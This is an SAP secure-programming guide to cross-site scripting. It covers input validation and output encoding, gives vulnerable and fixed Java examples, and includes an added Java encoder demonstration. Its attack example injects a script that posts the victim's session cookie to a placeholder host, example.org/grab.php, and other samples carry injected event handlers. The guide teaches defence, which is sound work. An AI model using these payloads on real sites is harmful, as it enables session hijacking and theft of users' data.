
Cross-Site Scripting (XSS) (SAP Library - Secure Programming) (81233D54D8C744C09B4434BABF7B0879)

Description
Cross-Site Scripting (XSS) attacks set out to manipulate HTML pages by injecting malicious script code or by other indirect techniques, such as redirection to another server, or logical attacks such as replacing images or changing style sheets. Attackers look for HTML pages where user input is written back to the HTML page, for example, when the logon screen is displayed a second time after a logon failure. These examples demonstrate the potential security vulnerabilities for XSS attacks whenever user input is written back to the HTML page. Because HTML is tag-based, the browser may even interpret and execute JavaScript or ActiveX controls, which might contain malicious SCRIPT commands. These commands are executed in the browser of any other user who opens the manipulated HTML page. The consequences of ActiveX attacks are as follows:

- The hacker might read, change or delete files on other users' local drives.
- Application actions might be executed under other users' privileges.
- The hacker might install other applications, such as Trojan horses.

In the case of JavaScript or VBScript, potential attacks may be:


- To send the browser into an endless loop.
- To redirect the browser to a different page by overwriting the document.location.href property.
- To access all user inputs (credit card numbers, and so on) and send them to a rogue server.
- To access the user's cookies (session hijacking, cookie manipulation).
- To insert new script tags as output between tags, which, for example, create new event handlers that are executed when certain events occur.

Examples
Example Code 1

    <a href="javascript:alert();">Click me!</a>

Example Code 2

    <img src="filename" onclick="alert();">

Example Code 3

    <textarea onchange="alert();">

What Do I Need to Do?


The basic rules to avoid XSS attacks are:

Constrain Input:

- Define a codepage (such as charset = ISO-8859-1) to clearly decide which characters are problematic.
- Filter metacharacters depending on the interpreter (HTML, browser, file system, and so on).
- Restrict variables to those characters that are explicitly allowed.
- Canonicalization, that is, before validating input you first have to bring it to an appropriate standard form. For more details on this topic, see Canonicalization.

Validate Input:

- All external input should be validated:
  - For field length
  - For data type
  - For range (such as date, postcode)
  - Against a white list, to accept only known unproblematic characters
- If users are allowed to enter a URL within the input field, restrict the domain of the URL and permit only the selection of approved URLs.
- Always enclose input values on HTML pages in quotation marks. This ensures that attacks are only possible if hackers leave the input value context (for example, HUGO), which is embedded in quotation marks, by using another ". Malicious code can then be detected in a simple manner by filtering for ".

Example

    <form name="HUGO">
    <input type="text" name="user" value="30">
    </form>

Omitting the quotation marks makes an XSS attack easier, because attackers do not have to leave the context by inserting a quotation mark ("). It is therefore much more difficult to filter malicious code out of such HTML pages.

Bad Example

    <form name=HUGO>
    <input type=text name=user value=30>
    </form>


Encode Output:

- Encode user-supplied output so that any inserted scripts are prevented from being transmitted to users in an executable form.
- Convert metacharacters, such as < to &lt;, > to &gt;, and " to &quot;, depending on the output context.
- Use the Output Encoding Framework, which is provided by the SAP NetWeaver platform.

Example
Part of the Company's Intranet Application

    public void doContent(...) {
        ...
        String s;
        if ((s = getUsernameByID("userid")) != null) {
            response.write("<br>Applicant:<u>" + s + "</u>");
        }
        ...
    }

Supposed Output

    <br>Applicant:<u>Smith</u>

Cross-Site Scripting (XSS) Example Attack

Data entered in the field "user name":

    <script>
    document.write('<form name=hack method=post action="http://www.example.org/grab.php">
    <input type=hidden name=sid value="' + escape(document.cookie) + '">');
    document.hack.submit();
    </script>
    Smith

Cross-Site Scripting (XSS) Attack Result

HTML output containing the applicant's input, rendered in the company's intranet:

    <br>Applicant:<u>
    <script>document.write('<form name=hack method=post action="http://www.example.org/grab.php">
    <input type=hidden name=sid value="' + escape(document.cookie) + '">');
    document.hack.submit();</script>
    Smith
    </u>

Visible Output

    Applicant: Smith

Cross-Site Scripting (XSS) Secure Code

Security enhanced function:

    public void doContent(...) {
        ...
        String s;
        if ((s = getUsernameByID("userid")) != null) {
            s = StringUtils.encodeToHTML(s, 50);
            response.write("<br>Applicant:<u>" + s + "</u>");
        }
        ...
    }
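The following Java class is an added example and is not SAP's Output Encoding Framework, the page's StringUtils class, or any other SAP code. It puts the "Validate Input" and "Encode Output" rules from above side by side: an allow-list check for the user name field, and an HTML encoder that replaces the metacharacters listed above, applied both to the applicant line from the example and to an input value that is always enclosed in quotation marks. The class name, the allow-list pattern and the helper names are the example's own; the encoder's second argument is assumed to be a maximum length, mirroring the call in the secure code.

```java
import java.util.regex.Pattern;

// Added example, not SAP code: allow-list validation plus HTML output encoding.
public class XssDemo {

    // Assumed policy for a user name field: letters, digits, space, dot, hyphen,
    // apostrophe; 1 to 50 characters. Everything else (including < > " ( ) ;) is rejected.
    private static final Pattern USER_NAME = Pattern.compile("^[\\p{L}\\p{N} .'\\-]{1,50}$");

    // Validate Input: accept only characters from the allow-list.
    public static boolean isValidUserName(String s) {
        return s != null && USER_NAME.matcher(s).matches();
    }

    // Encode Output: replace the HTML metacharacters that would let a value leave
    // the element-content or quoted-attribute context. maxLen is assumed to be a
    // maximum length, like the second argument of the page's encodeToHTML call.
    public static String encodeToHTML(String s, int maxLen) {
        if (s == null) {
            return "";
        }
        if (s.length() > maxLen) {
            s = s.substring(0, maxLen);
        }
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;   // must come first in any encoder
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // The applicant line from the intranet example, written with the encoded value.
    public static String renderApplicant(String userName) {
        return "<br>Applicant:<u>" + encodeToHTML(userName, 50) + "</u>";
    }

    // The HUGO form field: the value is always enclosed in quotation marks and encoded,
    // so a quotation mark inside the value cannot close the attribute.
    public static String renderUserField(String value) {
        return "<input type=\"text\" name=\"user\" value=\"" + encodeToHTML(value, 50) + "\">";
    }

    public static void main(String[] args) {
        String benign = "Smith";
        // Constructed sample modelled on the page's attack data, shortened for the demo.
        String hostile = "<script>document.write('<form name=hack>')</script>Smith";

        System.out.println("valid(\"Smith\")   = " + isValidUserName(benign));
        System.out.println("valid(hostile)   = " + isValidUserName(hostile));
        System.out.println(renderApplicant(benign));
        System.out.println(renderApplicant(hostile));
        // Constructed value that tries to close the quoted attribute and add an event handler.
        System.out.println(renderUserField("30\" onclick=\"alert();"));
    }
}
```

Running main shows the two rules working together: the hostile name fails the allow-list before it is stored, and even if such a value reaches the output stage, the encoded applicant line carries the script tags as literal text rather than as markup, while the encoded field value stays inside its quotation marks. In a real application both checks apply at once: validation rejects unexpected input early, and encoding at the output point protects against whatever validation did not cover.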

What Do I Get from the SAP NetWeaver Platform?


The possibilities available with the SAP NetWeaver platform depend on the type of application you are using. See:

- Using SAP Output Encoding Framework
- Using BSP-Extensions (HTMLB, XHTMLB and PHTMLB)
- ITS and BusinessHTML (BHTML)
- Web Dynpro for ABAP

Further Information
See Further Information on Cross-Site Scripting.

Generated by Jive SBS on 2011-01-11+01:00 5
